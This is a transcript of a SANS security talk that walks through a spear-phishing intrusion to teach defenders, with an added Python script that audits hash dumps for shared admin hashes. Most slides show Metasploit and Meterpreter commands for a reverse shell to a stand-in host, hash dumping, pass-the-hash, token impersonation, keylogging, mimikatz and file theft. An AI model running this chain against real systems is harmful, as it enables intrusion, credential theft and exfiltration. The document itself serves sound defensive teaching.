Why are our defenses failing us? One click is all it takes...
Organizations are spending unprecedented amounts of money in an attempt to defend their assets...yet all too often, one click is all it takes for it all to come toppling down around them. Every day we read in the news about national secrets, intellectual property, financial records & personal details being exfiltrated from the largest organizations on Earth. How is this being done? How are they bypassing our defenses (e.g. strong passwords, non-privileged accounts, anti-virus, firewalls/proxies, IDS/IPS, logging, etc.) And most importantly, what can we do about it? A keen understanding of the true risks we face in today's threatscape is paramount to our success...

This technical presentation will walk through an example spear-phishing campaign to demonstrate:
- How attackers perform recon on key individuals in target organizations (e.g. admins, executives, engineers, help desk personnel, etc.)
- How attackers craft and deliver payloads that bypass most detection mechanisms
- How attackers elevate privileges to super-user levels - even on fully patched systems
- How attackers bypass strong passwords, smart cards, multi-factor, biometrics and virtually all forms of strong authentication
- How attackers move throughout the environment in search of their "prize" with minimal footprint or artifacts
- How attackers exfiltrate secrets out of the organization undetected

Many organizations are busy being busy, managing all kinds of projects and initiatives. They have all the right products. They have more logs than they know what to do with. Yet the uncomfortable question persists, "is it working?" If one click by a user is all it takes, we need to re-evaluate...

Transcript

  • 1. The SANS Institute “Why Are Our Defenses Failing Us? One Click Is All It Takes…” Bryce Galbraith, Principal Instructor https://www.linkedin.com/in/bgalbraith bryce@layeredsec.com @BryceGalbraith (Twitter) BryceGalbraith (Google+) This presentation is available at: http://www.slideshare.net/brycegalbraith/ Bryce Galbraith ©2014, All Rights Reserved 1
  • 2. Who am I? • A professional (ethical) hacker • Contributing author of, Hacking Exposed • Co-author of Foundstone’s, Ultimate Hacking course series • The founder of Layered Security • Principal Instructor and course author with the SANS Institute • Frequent speaker, blogger, Tweeter… Bryce Galbraith ©2014, All Rights Reserved 2
  • 3. Great quote "The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes, little bits of data. It's all just electrons.” -- Cosmo from the movie, “Sneakers” Bryce Galbraith ©2014, All Rights Reserved 3
  • 4. Never Before • Never before has there been such frenzy over these ones and zeroes • Never before have the stakes been higher than they are today • Never before has there been more need for advanced defensive technologies and skilled defenders Bryce Galbraith ©2014, All Rights Reserved 4
  • 5. Front page moments • Everywhere you look… – Major organizations are being breached • Continuous stream of announcements • No one seems to be immune • Many don’t even realize they are compromised – Major consequences • National secrets, intellectual property, PII, lost revenue, expensive cleanups, embarrassment, shame and numerous other negative effects Bryce Galbraith ©2014, All Rights Reserved 5
  • 6. The Actors • There are many actors – Nation states – Organized crime – Hacktivists – Terrorists – Competitors – Cyber punks Bryce Galbraith ©2014, All Rights Reserved 6
  • 7. Bryce Galbraith ©2014, All Rights Reserved 7
  • 8. So what are we missing? • Why are they able to do this? – We’re spending more than ever – Security products have matured – Regulations and laws abound – Awareness is higher than ever – Many orgs have the right products – Most orgs are doing good things Bryce Galbraith ©2014, All Rights Reserved 8
  • 9. Attackers choose the path of least resistance… Bryce Galbraith ©2014, All Rights Reserved 9
  • 10. This is all too often our users Bryce Galbraith ©2014, All Rights Reserved 10 Over half of the users clicked “Yes” to this warning! Most malware doesn’t present a warning at all…
  • 11. For RSA it was this… Bryce Galbraith ©2014, All Rights Reserved 11
  • 12. But click on what, exactly? • There are so many delivery options… – Potentially any website link • Drive-by downloads, links in e-mails, hacked sites hosting malicious code, etc. – Potentially any e-mail attachment • Malicious code can be easily delivered via attachments • MS Office (DOC/PPT/XLS/etc.), Adobe PDF, ZIP/RAR files, etc. – CD-ROMs or USB sticks in parking lot • Recent US Department of Homeland Security study – 60% of users brought them into work and the malware executed on their machines. It jumped to over 90% with an official label. • Man-in-the-middle attacks (powerful enabler) Bryce Galbraith ©2014, All Rights Reserved 12
  • 13. One click? Really? • Is this really all it takes to bring down an entire organization? – Is this fact or F.U.D.? – Read the news…spear phishing often at the root • What about all of our defenses? – Modern OSs, strong passwords, good patching, smart cards, biometrics, non-admin user privs, anti-virus, smarter firewalls and proxies, IDS/IPS, etc. – Assuming we actually do all of these, attackers are still winning…otherwise, it’s just easier. Bryce Galbraith ©2014, All Rights Reserved 13
  • 14. So, what happens when our users click the wrong thing? • Let’s take a look at how quickly the dominos fall right after someone does this… Bryce Galbraith ©2014, All Rights Reserved 14
  • 15. No APT required • The following real-world example – Uses the Metasploit Framework • Free, open source exploitation framework – No über nation state sponsored malware or 0-days required – We do this against our clients on a regular basis - with permission  Bryce Galbraith ©2014, All Rights Reserved 15
  • 16. Craft the payload • The Metasploit Framework provides – Numerous file types • raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, vba, vbs, loop-vbs, asp, war • Office .doc/.xls, Adobe PDFs, Setup.exe, etc. – Numerous encoders • Multiple iterations w/ difference encoders – Numerous payloads (stages) • Meterpreter, vncinject, basic shell, many more – Numerous stagers • reverse_https, reverse_tcp, PassiveX, and more • Can use IPv6 or tunnel inside DNS packets – Social Engineering Toolkit aids in delivery • https://www.trustedsec.com/ Bryce Galbraith ©2014, All Rights Reserved 16
  • 17. Command and Control (C2)
    • Most orgs do not inspect SSL/TLS
    • Malware can establish a reverse HTTPS (or DNS) connection

    msf exploit(handler) > exploit
    [*] Started reverse handler on trustme.example.com:443
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 203.0.113.42
    [*] Meterpreter session 1 opened (trustme.example.com:443 -> 10.10.10.72:1146)
    meterpreter >

    Fast flux DNS techniques make the attacker’s IP a moving target that can be changed arbitrarily. Metasploit’s Meterpreter module is an amazing memory resident agent with numerous capabilities…
    Bryce Galbraith ©2014, All Rights Reserved 17
  • 18. What about NAT, firewalls, proxies and IDS/IPS? • This uses a reverse connection from a workstation to a place on the Internet over HTTPS? Hmm… – Looks very normal (avoids blacklists) – Malware can even hijack authenticated IE sessions • They’ve been doing it for years (e.g. BHO, OLE) • Smart cards, one-time passwords, biometrics and authenticated proxies can all be bypassed – Most organizations miss this entirely Bryce Galbraith ©2014, All Rights Reserved 18
  • 19. What about anti-virus? • Unfortunately, attackers have mastered the art of AV evasion – This is not a slam against AV (really) – All defenses have weaknesses – AV vendors have an extremely difficult job and they fight the fight daily – However, AV tends to be reactionary – Attackers have entire evasion frameworks • https://www.veil-evasion.com/ Bryce Galbraith ©2014, All Rights Reserved 19
  • 20. What about non-Admin users? • Limiting local Admin rights is a great idea for many reasons • However, many organizations grant regular users local Admin rights on their workstations anyway – Layers 8 & 9 (politics and funding) to blame? • If we do, escalation is often not even necessary for the attacker to perform • For those that do restrict local admin rights, there are still many options for attackers Bryce Galbraith ©2014, All Rights Reserved 20
  • 21. Local Privilege Escalation
    • Some activities require elevated permission levels
      – Local privilege escalation exploits
      – Often not patched in a timely fashion
      – Lower priority patches

    meterpreter > run post/windows/escalate/exploit_of_the_month
    <snip>
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

    New exploits come out regularly and 0-days make this especially likely over time…
    Bryce Galbraith ©2014, All Rights Reserved 21
  • 22. In memory process migration
    • Client exploitation is notoriously unstable and often temporary
    • Attacker solution? Migrate to a more stable process…even AV itself

    meterpreter > run migrate -n lsass.exe
    [*] Current server process: VictimProcess.exe (732)
    [*] Migrating to lsass.exe...
    [*] Migrating into process ID 640
    [*] New server process: lsass.exe (640)
    meterpreter > getpid
    Current pid: 640
    meterpreter >

    Local Security Authority Subsystem is a particularly stable and powerful process to migrate to. It has access to numerous security and crypto related functions…
    Bryce Galbraith ©2014, All Rights Reserved 22
  • 23. Grab password hashes
    • Local Admin passwords are often re-used throughout organizations

    meterpreter > run post/windows/gather/hashdump
    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY ec32582b07e1d725c13740421bda27fa...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...
    No users with password hints on this system
    [*] Dumping password hashes...
    NothingToSeeHere:500:5de59993f0a692ecc385a2a45364135b:a2158ca073c138cdcc7dea0727f34908:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:4496f4261a9307fe24a9c5742f83c890:58342ef2f4a89d14b535a5fed898f383:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1b944ffade0d3c4997fe550aeb67e4cf:::
    Administrator:1005:aad3b435b51404eeaad3b453b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    The built-in Admin account always has a RID of 500, regardless of the username. Decoys are easily spotted.
    Bryce Galbraith ©2014, All Rights Reserved 23
  • 24. Crack the passwords • Rainbow Tables make quick work of virtually all passwords less than 15 characters if in LM Hash form – https://www.objectif-securite.ch/ This administrator account hash cracked in mere seconds on this site that provides a large rainbow table set accessible via a simple web interface… Bryce Galbraith ©2014, All Rights Reserved 24
  • 25. What about strong passwords? • What if LM Hashes aren’t stored? • What if passwords are 15+ chars? • Cracking hashes isn’t even necessary once the attacker has them • They can simply pass-the-hash to the next host…yes, really – Common local admin password re-use makes this even more damaging Bryce Galbraith ©2014, All Rights Reserved 25
  • 26. Pivoting and pass-the-hash

    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(handler) > route add 10.10.10.73 255.255.255.255 1
    [*] Route added
    msf exploit(handler) > use exploit/windows/smb/psexec
    msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(psexec) > set SMBUser NothingToSeeHere
    msf exploit(psexec) > set SMBPass 5de59993f0a692ecc385a2a45664135b:a2158ca073c183cdcc7dea0727f34908
    msf exploit(psexec) > set RHOST 10.10.10.73
    msf exploit(psexec) > set LHOST 10.10.10.72
    msf exploit(psexec) > exploit
    [*] Connecting to the server...
    [*] Started bind handler
    [*] Authenticating to 10.10.10.73:445 as user 'NothingToSeeHere'
    <snip>
    [*] Sending stage (752128 bytes)
    [*] Closing service handle...
    [*] Meterpreter session 2 opened (10.10.78.200-10.10.10.72:443 -> 10.10.10.73:1656)
    meterpreter >

    The attacker is able to pivot through the existing HTTPS session with the first victim and pass the common Admin hash to the next victim without ever cracking it or knowing the password!
    (Diagram: 10.10.10.72 -> 10.10.10.73)
    Bryce Galbraith ©2014, All Rights Reserved 26
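Slides 23 through 26 describe three conditions a defender can check for in their own hash dumps: LM hashes still being stored (rainbow-table crackable below 15 characters), the built-in Administrator being identifiable by RID 500 no matter what it is named, and the same local Admin hash being valid on many hosts, which is what makes pass-the-hash so damaging. The following Python audit is an added example, not code from the presentation or from Metasploit. It parses pwdump-format lines like those on slide 23 and reports each condition. The host names and hash values in the sample data are constructed; only the two empty-string hash constants (empty LM and empty NT) are real, well-known values.

```python
"""Audit pwdump-format hash lines for LM storage, blank passwords,
renamed RID-500 accounts and local admin hash re-use across hosts."""
import re
from collections import defaultdict

# Hash of the empty password in each format (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BUILTIN_ADMIN_RID = 500  # the built-in Administrator, whatever it is named

# user:rid:lmhash:nthash::: (the format hashdump and pwdump tools emit)
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):"
)


def parse_pwdump_line(line):
    """Return a dict for one pwdump line, or None if the line is not one."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "rid": int(m["rid"]),
            "lm": m["lm"].lower(), "nt": m["nt"].lower()}


def audit_host(hostname, lines):
    """Per-account findings for one host's dump: (host, user, issue) tuples."""
    findings = []
    for a in filter(None, map(parse_pwdump_line, lines)):
        if a["lm"] != EMPTY_LM:
            findings.append((hostname, a["user"],
                             "LM hash stored (rainbow-table crackable below 15 chars)"))
        if a["nt"] == EMPTY_NT:
            findings.append((hostname, a["user"], "blank password"))
        if a["rid"] == BUILTIN_ADMIN_RID and a["user"].lower() != "administrator":
            findings.append((hostname, a["user"],
                             "built-in Administrator renamed (RID 500 identifies it anyway)"))
    return findings


def find_shared_local_admin_hashes(dumps):
    """dumps: {hostname: [pwdump lines]}.
    Returns {nt_hash: [hosts]} for RID-500 NT hashes seen on more than one host,
    i.e. the hosts a single pass-the-hash credential would reach."""
    by_hash = defaultdict(list)
    for host, lines in dumps.items():
        for a in filter(None, map(parse_pwdump_line, lines)):
            if a["rid"] == BUILTIN_ADMIN_RID and a["nt"] != EMPTY_NT:
                by_hash[a["nt"]].append(host)
    return {h: hosts for h, hosts in by_hash.items() if len(hosts) > 1}


def audit(dumps):
    """All findings across hosts, including cross-host local admin re-use."""
    findings = []
    for host, lines in dumps.items():
        findings.extend(audit_host(host, lines))
    for hosts in find_shared_local_admin_hashes(dumps).values():
        findings.append((",".join(sorted(hosts)), "RID 500",
                         f"same local admin NT hash on {len(hosts)} hosts: "
                         "pass-the-hash reaches all of them"))
    return findings


# Constructed sample dumps; hash values other than the empty-hash constants are made up.
SAMPLE_DUMPS = {
    "WS-NBURNS": [
        "NothingToSeeHere:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "nickburns:1005:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::",
    ],
    "WS-JSMITH": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
}

if __name__ == "__main__":
    for host, user, issue in audit(SAMPLE_DUMPS):
        print(f"{host:22} {user:18} {issue}")
```

Run against real output, the cross-host check is the one to act on first: every host that shares a RID-500 NT hash is one psexec away from any other host in that group, regardless of how long the password is.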
  • 27. So, let’s not use passwords! • If hashes can simply be passed, let’s use something better – Biometrics, tokens, smart cards, RFID/NFC in our hand (cringe), DNA? Bryce Galbraith ©2014, All Rights Reserved 27
  • 28. Sadly, it doesn’t matter… • The method of authentication is often irrelevant to attackers • They have discovered methods to attack us post-authentication • After all, it is the actual authenticated user that is doing the clicking – ugh • When they know more than we do, they win – no mercy Bryce Galbraith ©2014, All Rights Reserved 28
  • 29. Security Access Tokens (SATs) • The SAT is all that matters after authentication has been completed – It doesn’t matter how we authenticated – Our SAT is conveyed to the system where we are accessing resources • File servers, SharePoint, home drive server(s) • As well as our local workstations – May reside in memory for hours – Even after users logoff Bryce Galbraith ©2014, All Rights Reserved 29
  • 30. Token impersonation (1) • With access to LSASS an attacker can impersonate other user tokens without ever having to know a password or authenticate at all • They simply impersonate the token of an authenticated user • Domain Admins are prime targets • Hackers love single sign-on solutions Bryce Galbraith ©2014, All Rights Reserved 30
  • 31. Token impersonation (2)

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > use incognito
    Loading extension incognito...success.
    meterpreter > list_tokens -u

    Delegation Tokens Available
    ========================================
    CORP\nickburns
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM

    meterpreter > impersonate_token CORP\nickburns
    [+] Delegation token available
    [+] Successfully impersonated user CORP\nickburns
    meterpreter > getuid
    Server username: CORP\nickburns
    meterpreter >

    The attacker is able to impersonate another user’s security context by impersonating their SAT directly from the LSASS process in memory. The attacker is the other user as far as Windows is concerned. An attacker can pass-the-hash to move to a system with many tokens (e.g. SharePoint, file servers, etc.) then impersonate a higher value token. Like a Domain Admin user token…without accessing their hash or knowing their password at all…
    Bryce Galbraith ©2014, All Rights Reserved 31
  • 32. Token impersonation (3)

    meterpreter > getuid
    Server username: CORP\nickburns
    meterpreter > shell
    Process 1428 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.

    C:\>net view /domain
    net view /domain
    Domain
    -------------------------------------------------------------------------------
    CORP
    The command completed successfully.

    C:\>

    The attacker can now use built-in Windows functionality (command-line kung fu) to discover new hosts and choose the next target… With the impersonated Domain Admin token, the attacker has access to virtually all Windows resources.
    Bryce Galbraith ©2014, All Rights Reserved 32
  • 33. Token impersonation (4)

    C:\>net view /domain:corp
    net view /domain:corp
    Server Name            Remark
    -------------------------------------------------------------------------------
    \\CORPDC               Corporate domain controller
    \\FILESRV042           Employee file server
    \\SHAREPOINT023        Corp Sharepoint server
    \\WS-NBURNS            Workstation
    The command completed successfully.

    C:\>net use * \\corpdc\c$
    net use * \\corpdc\c$
    Drive Z: is now connected to \\corpdc\c$.
    The command completed successfully.

    C:\>z:
    Z:\>

    The attacker is now able to map a drive to the AD domain controller without even providing a password. Single sign-on works for attackers too…
    Bryce Galbraith ©2014, All Rights Reserved 33
  • 34. Passwords are still the best • Despite these powerful techniques, attackers often prefer actual passwords if possible – Longer term access, easier movement, less limitations, may allow additional access • Password re-use/sync across other systems (e.g. VPN, non-windows systems) Bryce Galbraith ©2014, All Rights Reserved 34
  • 35. Key logging
    • Key logging can expose even the strongest of passwords

    meterpreter > run migrate -n explorer.exe
    [*] Current server process: lsass.exe (476)
    [+] Migrating to 3808
    [+] Successfully migrated to process
    meterpreter > bgrun keylogrecorder -t 1
    [*] Executed Meterpreter with Job ID 1
    meterpreter >
    [*] Starting the keystroke sniffer...
    [*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/10.10.10.100.txt
    [*] Recording
    meterpreter >

    The attacker migrates into explorer.exe, the Desktop. This does NOT require Administrative privileges.

    # tail -f /root/.msf4/logs/scripts/keylogrecorder/10.10.10.100.txt
    0h,Urw3lc0me!$#^ <Return>
    0p3n$3zm3IS@id! <Return>
    They will never guess this one1!@#$ <Return>

    These will surely be useful to the attacker.
    Bryce Galbraith ©2014, All Rights Reserved 35
  • 36. RAM-scraping malware
    • Passwords can even be scraped directly from RAM (memory)

    meterpreter > load mimikatz
    Loading extension mimikatz...success.
    meterpreter > wdigest
    [+] Running as SYSTEM
    [*] Retrieving wdigest credentials
    wdigest credentials
    ===================

    AuthID    Package    Domain        User           Password
    ------    -------    ------        ----           --------
    0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
    0;996     Negotiate  WORKGROUP     WS-JSMITH$
    0;459879  NTLM       CORP          Jsmith         I hope they won't guess this.

    meterpreter >

    Metasploit’s mimikatz extracts sensitive information directly from memory.
    Bryce Galbraith ©2014, All Rights Reserved 36
  • 37. Additional capabilities • Once the attacker has this kind of access they can – Capture key strokes – Take screenshots – Manipulate your webcam – Record through your microphone – Virtually anything software can do… meterpreter > run Display all 225 possibilities? (y or n) So many possibilities with Meterpreter’s post-exploitation scripts. Bryce Galbraith ©2014, All Rights Reserved 37
  • 38. Desktop screen shots

    meterpreter > run screenspy
    [*] New session on 10.10.10.100:49417...
    [*] explorer.exe Process found, migrating into 2624
    [*] Migration Successful!!
    [*] Opening Interactive view…

    Anything on the display is now at risk. The “run screenspy” script gives a continuous stream of screenshots at attacker defined intervals - ouch
    Is that KeePass password manager?? Passwords are hard to manage. Password managers are great tools for this…and they are big targets.
    Bryce Galbraith ©2014, All Rights Reserved 38
  • 39. Expand influence (1)

    meterpreter > shell
    Process 1428 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) Microsoft Corporation. All rights reserved.

    C:\>cd c:\Doc*\nickb*\My*

    C:\Documents and Settings\nickburns\My Documents>dir kee*
     Volume in drive C has no label.
     Volume Serial Number is C4E8-4270

     Directory of C:\Documents and Settings\nickburns\My Documents

    06/22/2014  07:39 PM             3,388 Keepass Database.kdb
                   1 File(s)          3,388 bytes
                   4 Dir(s)  40,122,826,752 bytes free

    C:\Documents and Settings\nickburns\My Documents>exit

    meterpreter > download C:\Documents and Settings\nickburns\My Documents\Keepass Database.kdb root
    [*] downloaded : C:\Documents and Settings\nickburns\My Documents\Keepass Database.kdb -> root/Keepass Database.kdb

    All files are at risk on the target systems. Including our password managers.
    Bryce Galbraith ©2014, All Rights Reserved 39
  • 40. Expand influence (2) The key logger captured the password to the password manager earlier: They will never guess this one1!@#$ Lucky for the attacker, they don’t have to guess… Bryce Galbraith ©2014, All Rights Reserved 40
  • 41. Expand influence (3) (Screenshot captions: Will likely expose non-Windows systems as well. This one has a 32-character random password.) Bryce Galbraith ©2014, All Rights Reserved 41
  • 42. Expand influence (4) Bryce Galbraith ©2014, All Rights Reserved 42
  • 43. One click really is all it takes… • One click led to… – Malicious code execution – Bypassing of the anti-virus – Controlled via one outbound connection – Privilege escalation up to SYSTEM level – Significant expansion of influence • Pivoted, cracked/passed hashes, impersonated SATs, etc. – Unauthorized access and exfiltration of highly sensitive zeros and ones – Network traffic looks very normal… Bryce Galbraith ©2014, All Rights Reserved 43
  • 44. Third Party Notification • Many organizations find out about these breaches when someone else tells them about it – Hackers (e.g. PasteBin, Tango Down!) – Customer complaints – Law enforcement, regulators, etc. – National security agencies Bryce Galbraith ©2014, All Rights Reserved 44
  • 45. Technology can’t do it alone… Bryce Galbraith ©2014, All Rights Reserved 45
  • 46. People | Process | Technology • People – Skilled defenders who understand the adversarial techniques being used – Tools and support required to win • Process – Strong policies and procedures that tackle these threats head-on • Technology – Advanced defensive technologies and solutions that really work Bryce Galbraith ©2014, All Rights Reserved 46
  • 47. We can win… • Attackers are not ghosts, they are not magic • But we cannot expect to defend against threats we do not know about or understand • Awareness is crucial • There are defenses that work • We must educate ourselves and our staff • We must empower our people with knowledge, advanced tools and the support they need to be successful, or else… Bryce Galbraith ©2014, All Rights Reserved 47
  • 48. Who will the next “winner” be? http://pwnies.com/ Bryce Galbraith ©2014, All Rights Reserved 48
  • 49. The SANS Institute “Why Are Our Defenses Failing Us? One Click Is All It Takes…” Bryce Galbraith, Principal Instructor https://www.linkedin.com/in/bgalbraith bryce@layeredsec.com @BryceGalbraith (Twitter) BryceGalbraith (Google+) This presentation is available at: http://www.slideshare.net/brycegalbraith/ Bryce Galbraith ©2014, All Rights Reserved 49